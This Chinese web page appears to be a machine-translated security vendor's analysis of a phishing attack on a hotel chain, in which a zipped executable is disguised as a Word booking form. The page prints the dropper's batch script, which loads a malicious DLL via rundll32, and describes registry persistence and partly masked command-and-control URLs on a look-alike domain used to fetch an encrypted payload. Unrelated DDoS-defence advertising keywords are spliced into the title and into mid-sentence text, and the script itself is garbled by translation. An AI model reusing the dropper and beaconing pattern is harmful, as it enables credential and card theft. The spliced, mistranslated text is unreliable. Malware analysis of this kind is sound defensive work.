来自 网络 2021-09-08 07:20 的文章

cc防御_ddos清洗原理_超高防御

cc防御_ddos清洗原理_超高防御

最近,我们发表了一份报告,讨论了针对大型连锁酒店的多起袭击事件。袭击主要针对信用卡盗窃。攻击者通过感染这类机构中的销售点终端来做到这一点。几天前,我们的一家豪华连锁酒店adaptivedefense360客户遭到攻击。我想借此机会展示一下网络犯罪分子是如何进入公司网络的。我们知道,在大多数情况下,ddos怎么防御阿,这些类型的攻击都是通过电子邮件发起的,电子邮件附带的文件会危害受害者的计算机,或者是指向一个页面的链接,该页面利用漏洞来达到攻击者的目的。就我们的客户而言,攻击始于一封写给一名酒店员工的电子邮件,声明附件提供了2016年5月底入住酒店所需的所有信息。邮件包含一个压缩文件附件,打开时包含一个带有Microsoft Word图标的文件。执行该文件时,它显示以下内容:这是一份由顾客填写的酒店预订表。他们在2016年5月底填写了住宿付款信息。正如你所看到的,它看起来并不奇怪。事实上,这个文档和这个酒店员工发送给他的客户的文档是相同的(甚至名字也是一样的),但是如果我们仔细观察,我们会发现这个文件来自一个zip文件。尽管图标出现了,但它是一个可执行文件。运行时,会在磁盘上创建三个文件,第一个文件将运行:–阅读器_序列号命令– ROCA.ING.docx公司– adobeUpd.dll(MD5:A213E36D3869E626D4654BCE67F6760C)第一个文件的内容如下:@回音关闭开始""ROCA.ING.docx公司设置xOS=x64如果"%PROCESSOR\uarchitecture%"=="x86",如果未定义处理器架构w6432,则设置xOS=x86如果"%xOS%"=="x64"(启动"C:\Windows\SysWOW64\rundll32.exeadobeUpd.dll,温克)如果"%xOS%"=="x86"(启动"C:\Windows\System32\rundll32.exeadobeUpd.dll,温克)ping-n12本地主机正如我们所看到的,它对受害者做的第一件事就是打开Word文档来运行并完成这个技巧。然后,山石防火墙防御ddos,windows防御cc,adobeUpd.dll使用参数"Wenk"运行。执行时,它会修改文件并将其标记为只读和隐藏,并在Windows注册表中创建一个条目,自己的服务器怎么防御CC,该条目在每次打开计算机时都会运行。使用特定URL联系:。************.ga/en/脚本/英语.php?流=lcc&user=iPmbzfAIRMFw然后它下载一个包含给定URL参数(iPmbzfAIRMFw)的用户的文件。在匹配的情况下,它会尝试下载该文件。************.ga/en/脚本/iPmbzfAIRMFw.jpg当我们试图下载它时,它是不可用的;它也不会在我们的客户系统中,因为我们阻止了感染尝试,恶意软件无法在那里运行。URL的域与我们的客户完全相同,只是他们有".com",而攻击者注册了一个名称相同但在加蓬(".ga")中的域。这样,如果酒店的安全团队在分析网络流量时看到了与域名的相似性,就不会引起注意。尽管文件iPmbzfAIRMFw.jpg不可用,如果我们看看代码adobeUpd.dll我们可以看到,他们实际上在这个文件中寻找一个特定的标记,然后它从中解密数据并将其作为PE运行(创建为"Temp\systm")。随后,adobeUpd.dll保持循环,每隔几分钟随机连接到:。************.ga/en/脚本/英语.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm正如我们所见,这次袭击是专门针对这家连锁酒店的。犯罪分子已经移除了你可以连接到恶意软件的服务器的所有痕迹,当我们中止攻击时,高防cdn代理,我们只能猜测他们下一步要做什么。根据我们的经验,这种类型的攻击试图让受害者的企业团队参与进来,然后横向移动以达到其最终目标:处理信用卡支付的销售点终端,正如我们在其他许多案例中看到的那样。传统的反病毒软件无法抵抗这种类型的攻击,因为它们是专门为受害者创建的威胁,它们总是确保当前反恶意软件解决方案所构建的签名、主动技术等不会检测到恶意软件。这就是为什么EDR类型的服务(端点检测和响应)配备了先进的保护技术,这是有效防范这些攻击的关键。